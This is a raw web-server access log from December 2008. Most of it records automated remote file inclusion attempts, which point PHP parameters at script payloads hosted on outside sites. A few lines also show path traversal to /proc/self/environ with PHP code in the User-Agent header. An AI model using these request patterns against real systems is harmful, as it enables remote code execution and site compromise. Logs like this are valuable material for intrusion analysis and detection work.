216.69.164.106 - - [03/Dec/2008:16:04:28 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.90.164.110 - - [03/Dec/2008:16:06:31 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:05:41 -0800] "GET /logs/showfile.php/access_081030.log/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.69" "www.webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:07:01 -0800] "GET /include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 594 "-" "libwww-perl/5.69" "www.webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:05:42 -0800] "GET /logs/showfile.php/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.69" "www.webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:05:55 -0800] "GET /include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 594 "-" "libwww-perl/5.69" "www.webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:07:19 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://thermalspray.or.kr/board/icon/idd.txt??%0D?? HTTP/1.1" 404 604 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:06:00 -0800] "GET /logs/showfile.php/access_081104.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://thermalspray.or.kr/board/icon/idd.txt??%0D?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:06:00 -0800] "GET /logs/showfile.php//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://thermalspray.or.kr/board/icon/idd.txt??%0D?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
69.20.70.31 - - [03/Dec/2008:16:07:23 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.17.253.220 - - [03/Dec/2008:16:06:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:06:07 -0800] "GET /logs/showfile.php/access_081103.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://thermalspray.or.kr/board/icon/idd.txt??%0D?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
62.149.226.208 - - [03/Dec/2008:16:07:54 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:07:17 -0800] "GET /logs/showfile.php/access_081107.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:08:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 617 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:07:18 -0800] "GET /logs/showfile.php//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
63.247.129.200 - - [03/Dec/2008:16:07:36 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 404 613 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "webmaster-showcase.net"
63.247.129.200 - - [03/Dec/2008:16:07:36 -0800] "GET /logs/errors.php?error=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 404 585 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "webmaster-showcase.net"
63.247.129.200 - - [03/Dec/2008:16:07:36 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 613 "-" "XXX<? echo "w0000t\"; ?>XXX" "webmaster-showcase.net"
63.247.129.200 - - [03/Dec/2008:16:07:37 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 613 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
218.239.45.184 - - [03/Dec/2008:16:07:37 -0800] "GET /logs/showfile.php/access_081103.log//include/admin.lib.inc.php?site_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
218.239.45.184 - - [03/Dec/2008:16:07:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 599 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
218.239.45.184 - - [03/Dec/2008:16:07:38 -0800] "GET /logs/showfile.php//include/admin.lib.inc.php?site_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
189.30.117.102 - - [03/Dec/2008:16:09:04 -0800] "GET /logs/showfile.php/access.log//?mosConfig_absolute_path=http://www.scriptrox.xpg.com.br/cmd1.txt? HTTP/1.1" 200 9382 "-" "Mozilla/3.0 (compatible; Indy Library)" "webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:09:08 -0800] "GET /phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 585 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:09:08 -0800] "GET /logs/showfile.php/access_081103.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:07:48 -0800] "GET /logs/showfile.php/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
194.72.238.37 - - [03/Dec/2008:16:09:13 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
211.247.226.253 - - [03/Dec/2008:16:07:57 -0800] "GET /logs/showfile.php/access_081104.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
211.247.226.253 - - [03/Dec/2008:16:07:57 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 584 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
211.247.226.253 - - [03/Dec/2008:16:07:58 -0800] "GET /logs/showfile.php/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
77.221.130.11 - - [03/Dec/2008:16:09:58 -0800] "GET /skin/zero_vote/error.php?dir=http://photo.jcc.idv.tw/id.txt????? HTTP/1.1" 404 581 "-" "libwww-perl/5.805" "webmaster-showcase.net"
77.221.130.11 - - [03/Dec/2008:16:08:38 -0800] "GET /logs/showfile.php/access.log//skin/zero_vote/error.php?dir=http://photo.jcc.idv.tw/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "webmaster-showcase.net"
77.221.130.11 - - [03/Dec/2008:16:09:58 -0800] "GET /logs/showfile.php//skin/zero_vote/error.php?dir=http://photo.jcc.idv.tw/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:08:40 -0800] "GET /logs/showfile.php/access_081113.log/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.69" "webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:08:40 -0800] "GET /include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 590 "-" "libwww-perl/5.69" "webmaster-showcase.net"
81.169.143.242 - - [03/Dec/2008:16:08:41 -0800] "GET /logs/showfile.php/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.69" "webmaster-showcase.net"
121.125.79.167 - - [03/Dec/2008:16:09:10 -0800] "GET /logs/showfile.php/access_081102.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:09:29 -0800] "GET /logs/showfile.php/access_081109.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
77.221.130.11 - - [03/Dec/2008:16:09:34 -0800] "GET /skin/zero_vote/error.php?dir=http://photo.jcc.idv.tw/id.txt????? HTTP/1.1" 404 585 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
77.221.130.11 - - [03/Dec/2008:16:09:34 -0800] "GET /logs/showfile.php//skin/zero_vote/error.php?dir=http://photo.jcc.idv.tw/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
77.221.130.11 - - [03/Dec/2008:16:10:54 -0800] "GET /logs/showfile.php/access_081029.log//skin/zero_vote/error.php?dir=http://photo.jcc.idv.tw/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
209.235.254.107 - - [03/Dec/2008:16:10:26 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
216.104.34.142 - - [03/Dec/2008:16:11:58 -0800] "GET /logs/showfile.php/access_081110.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.810" "www.webmaster-showcase.net"
91.121.83.198 - - [03/Dec/2008:16:12:09 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt? HTTP/1.1" 404 583 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
82.78.216.197 - - [03/Dec/2008:16:13:43 -0800] "GET /index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.webmaster-showcase.net"
193.151.90.152 - - [03/Dec/2008:16:12:37 -0800] "GET /phpBB2/posting.php?mode=newtopic&f=2&sid=11806ede38df403e925851b2efa94093 HTTP/1.1" 200 31495 "-" "Opera/9.21 (Windows NT 5.1; U; ru)" "webmaster-showcase.net"
212.95.226.66 - - [03/Dec/2008:16:12:52 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
82.78.216.197 - - [03/Dec/2008:16:13:45 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 592 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
202.64.130.106 - - [03/Dec/2008:16:15:13 -0800] "GET /phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 585 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
202.64.130.106 - - [03/Dec/2008:16:15:13 -0800] "GET /logs/showfile.php/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
202.64.130.106 - - [03/Dec/2008:16:13:54 -0800] "GET /logs/showfile.php/access_081103.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
72.46.145.6 - - [03/Dec/2008:16:14:16 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 404 625 "-" "libwww-perl/5.812" "www.webmaster-showcase.net"
72.46.145.6 - - [03/Dec/2008:16:15:36 -0800] "GET /logs/showfile.php/access_081110.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.812" "www.webmaster-showcase.net"
72.46.145.6 - - [03/Dec/2008:16:14:17 -0800] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.812" "www.webmaster-showcase.net"
208.109.21.239 - - [03/Dec/2008:16:14:20 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
91.121.2.160 - - [03/Dec/2008:16:14:28 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 625 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
72.46.145.6 - - [03/Dec/2008:16:15:39 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 404 621 "-" "libwww-perl/5.812" "webmaster-showcase.net"
72.46.145.6 - - [03/Dec/2008:16:15:39 -0800] "GET /logs/showfile.php/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.812" "webmaster-showcase.net"
72.46.145.6 - - [03/Dec/2008:16:15:39 -0800] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.812" "webmaster-showcase.net"
210.219.173.249 - - [03/Dec/2008:16:17:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 625 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
201.155.147.245 - - [03/Dec/2008:16:16:22 -0800] "GET /logs/showfile.php/access_081030.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:18:06 -0800] "GET /logs/showfile.php/access_081107.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:16:46 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 617 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:16:47 -0800] "GET /logs/showfile.php//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:18:07 -0800] "GET /logs/showfile.php/access_081107.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:18:08 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 617 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
219.94.174.158 - - [03/Dec/2008:16:18:08 -0800] "GET /logs/showfile.php//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
201.80.215.232 - - [03/Dec/2008:16:17:10 -0800] "GET /technote7/data/errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt?? HTTP/1.1" 404 582 "-" "libwww-perl/5.805" "webmaster-showcase.net"
207.126.62.105 - - [03/Dec/2008:16:17:53 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.yamuca.com//Social/pre_614/idd.txt?%0D?? HTTP/1.1" 404 604 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
207.126.62.105 - - [03/Dec/2008:16:17:53 -0800] "GET /logs/showfile.php/access_081104.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.yamuca.com//Social/pre_614/idd.txt?%0D?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
207.126.62.105 - - [03/Dec/2008:16:19:13 -0800] "GET /logs/showfile.php//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.yamuca.com//Social/pre_614/idd.txt?%0D?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
68.80.42.162 - - [03/Dec/2008:16:17:58 -0800] "GET /phpBB2/posting.php?mode=newtopic&f=2&sid=968e0f6ba46d6f5bd1ca4cc77388630e%2B%255B0,30515,31171%255D%2B-%253E%2B%255BN%255D%2BPOST%2Bhttp://webmaster-showcase.net/phpBB2/posting.php%2B%255B14342,0,13065%255D HTTP/1.0" 200 31479 "http://webmaster-showcase.net/phpBB2/posting.php?mode=newtopic&f=2&sid=968e0f6ba46d6f5bd1ca4cc77388630e%2B%255B0,30515,31171%255D%2B-%253E%2B%255BN%255D%2BPOST%2Bhttp://webmaster-showcase.net/phpBB2/posting.php%2B%255B14342,0,13065%255D" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "webmaster-showcase.net"
207.126.62.105 - - [03/Dec/2008:16:18:03 -0800] "GET /logs/showfile.php/access_081103.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.yamuca.com//Social/pre_614/idd.txt?%0D?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
68.80.42.162 - - [03/Dec/2008:16:18:09 -0800] "POST /phpBB2/posting.php?sid=5d696d87490848b6d07170b6aee34224 HTTP/1.0" 200 14278 "http://webmaster-showcase.net/phpBB2/posting.php?mode=newtopic&f=2&sid=968e0f6ba46d6f5bd1ca4cc77388630e%2B%255B0,30515,31171%255D%2B-%253E%2B%255BN%255D%2BPOST%2Bhttp://webmaster-showcase.net/phpBB2/posting.php%2B%255B14342,0,13065%255D" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "webmaster-showcase.net"
91.121.2.160 - - [03/Dec/2008:16:19:11 -0800] "GET /logs/showfile.php/access_081110.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
91.121.2.160 - - [03/Dec/2008:16:20:32 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 625 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
91.121.2.160 - - [03/Dec/2008:16:19:12 -0800] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
216.69.164.106 - - [03/Dec/2008:16:19:28 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
74.55.93.138 - - [03/Dec/2008:16:20:58 -0800] "GET /logs/showfile.php/access_081110.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
74.55.93.138 - - [03/Dec/2008:16:20:59 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 625 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
74.55.93.138 - - [03/Dec/2008:16:20:59 -0800] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
91.121.2.160 - - [03/Dec/2008:16:19:46 -0800] "GET /logs/showfile.php/access_081102.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
64.90.164.110 - - [03/Dec/2008:16:21:32 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
74.55.93.138 - - [03/Dec/2008:16:20:17 -0800] "GET /logs/showfile.php/access_081102.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
201.80.215.232 - - [03/Dec/2008:16:20:25 -0800] "GET /logs/showfile.php/access_081102.log//technote7/data/errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
69.20.70.31 - - [03/Dec/2008:16:21:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.17.253.220 - - [03/Dec/2008:16:21:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
202.64.130.106 - - [03/Dec/2008:16:22:33 -0800] "GET /phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 585 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
202.64.130.106 - - [03/Dec/2008:16:21:13 -0800] "GET /logs/showfile.php/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
202.64.130.106 - - [03/Dec/2008:16:21:13 -0800] "GET /logs/showfile.php/access_081102.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
62.149.226.208 - - [03/Dec/2008:16:22:55 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:22:15 -0800] "GET /skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 581 "-" "libwww-perl/5.803" "webmaster-showcase.net"
194.72.238.37 - - [03/Dec/2008:16:22:53 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
72.30.79.97 - - [03/Dec/2008:16:22:59 -0800] "GET /logs/showfile.php/access_071110.log HTTP/1.0" 200 1579 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.webmaster-showcase.net"
91.121.83.198 - - [03/Dec/2008:16:24:06 -0800] "GET /logs/showfile.php/access_081030.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
91.121.83.198 - - [03/Dec/2008:16:25:27 -0800] "GET /logs/showfile.php/access_081030.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt? HTTP/1.0" 200 1579 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
91.121.83.198 - - [03/Dec/2008:16:25:28 -0800] "GET /logs/showfile.php/access_081030.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
91.121.83.198 - - [03/Dec/2008:16:24:08 -0800] "GET /logs/showfile.php//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt? HTTP/1.1" 200 3345 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
210.219.173.249 - - [03/Dec/2008:16:26:09 -0800] "GET /logs/showfile.php/access_081110.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
210.219.173.249 - - [03/Dec/2008:16:24:50 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 625 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
210.219.173.249 - - [03/Dec/2008:16:24:50 -0800] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
66.249.70.248 - - [03/Dec/2008:16:26:23 -0800] "GET /phpBB2/viewtopic.php?p=100036&sid=488b883fa3197e48bc71ad3fd1f89acc HTTP/1.1" 200 99275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:25:09 -0800] "GET /logs/showfile.php/access.log//skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:25:09 -0800] "GET /skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 581 "-" "libwww-perl/5.811" "webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:25:10 -0800] "GET /logs/showfile.php//skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "webmaster-showcase.net"
